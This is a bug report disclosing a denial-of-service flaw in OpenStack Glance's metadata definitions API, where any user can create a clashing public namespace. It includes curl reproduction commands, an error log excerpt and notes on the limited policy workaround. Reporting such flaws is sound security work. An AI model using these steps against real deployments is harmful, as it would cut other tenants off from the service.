Comment 0 for bug 1479385

Revision history for this message
Niall Bunting (niall-bunting) wrote :


Through creation of a new public namespace by any user of the system, you can create a clash of namespaces, that breaks all accessibility to that namespace. This therefore can be used to cause a denial of service attack or you have to disable the service completely.

How to produce:

As a regular user run the command:
curl -v -X POST -H "Content-Type: application/json" -H "X-Auth-Token: 1a499605071a46a8b9b2a938fac5fac7" -d '{"namespace": "OS::Computer::WebServers", "visibility": "public"}'

This will create a new namespace with the same name as the existing namespace. This has now rendered the original namespace inaccessible. If a GET request is done to the namespaces name by any other user via (or viewing in horizon):
curl -v -X GET -H "Content-Type: application/json" -H "X-Auth-Token: 1a499605071a46a8b9b2a938fac5fac7"

It will cause the following output in the api console:
2015-07-28 23:41:42.175 ERROR glance.api.v2.metadef_properties [req-e3a80995-6f37-4e5c-b7dd-a1ce978478c7 f76c222365fb490792300f9e49ec9bd0 9db14ac3320b4396b58222f99dd04e4e] Multiple rows were found for one()

Returning a 500 to the user and therefore the namespace inaccessible meaning a successful denial of service to most of the metadefs api as most require it.

Attempted preventative measures:
In the policy.json files there are only the following values:
"get_metadef_namespace": "",
meaning that creating namespaces has to be disabled completely(not default ) as there in no publicize option.